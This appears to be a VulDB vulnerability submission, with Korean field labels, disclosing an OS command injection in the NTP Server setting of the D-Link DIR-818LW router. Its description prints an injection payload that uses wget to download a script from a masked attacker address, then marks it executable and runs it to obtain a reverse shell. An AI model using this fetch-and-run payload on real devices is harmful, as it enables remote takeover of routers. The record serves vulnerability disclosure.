| 제목 | D-LINK DIR-818LW HW:B1 OS Command Injection |
|---|
| 설명 | In the D-Link router model DIR-818LW, there is a Remote Code Execution (RCE) vulnerability located in the "Management > System Time" submenu, specifically in the "NTP Server" parameter. This field is intended to configure the server from which the router retrieves time synchronization data. However, it is possible to inject a malicious payload into this field, allowing the execution of arbitrary commands and ultimately achieving a reverse shell in Bash.
script: eixicgrg; (test -e /tmp/n.sh || wget http://xxx.xxx.xxx.xxx:xxxx/n.sh -O /tmp/n.sh; chmod 777 /tmp/n.sh; /tmp/n.sh &); |
|---|
| 원천 | ⚠️ http://x.x.x.x/info/Login.html |
|---|
| 사용자 | Havook (UID 71104) |
|---|
| 제출 | 2025. 07. 12. AM 10:18 (11 개월 ago) |
|---|
| 모더레이션 | 2025. 07. 12. PM 08:44 (10 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 316251 [D-Link DIR-818LW 까지 20191215 System Time Page NTP Server 권한 상승] |
|---|
| 포인트들 | 20 |
|---|